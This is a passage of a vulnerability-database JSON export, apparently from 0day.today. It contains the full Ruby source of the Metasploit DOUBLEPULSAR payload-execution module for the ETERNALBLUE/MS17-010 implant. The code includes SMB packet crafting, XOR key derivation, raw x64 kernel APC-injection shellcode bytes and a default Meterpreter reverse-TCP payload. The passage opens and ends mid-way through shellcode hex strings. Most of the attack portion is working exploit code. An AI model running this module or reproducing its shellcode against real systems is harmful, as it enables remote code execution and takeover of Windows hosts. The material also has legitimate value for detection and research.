\"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-13] #"}, "lastseen": "2021-09-12T22:15:25", "differentElements": ["sourceData"], "edition": 15}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "1a3c5772bfefd9ec2aef9074df62d931", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0143", "CVE-2017-0144"], "immutableFields": [], "lastseen": "2021-09-13T22:19:18", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:43970", "EDB-ID:42031", 
"EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27802", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:146236", "PACKETSTORM:154690"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96705", "SMNTC-96703", "SMNTC-96704", "SMNTC-96709", "SMNTC-96706", "SMNTC-96707"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": 
"trendmicroblog", "idList": ["TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0144", "MS:CVE-2017-0148"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}], "modified": "2021-09-13T22:19:18", "rev": 2}, "score": {"value": 7.4, "vector": "NONE", "modified": "2021-09-13T22:19:18", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: 
https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => 
true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable 
to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n 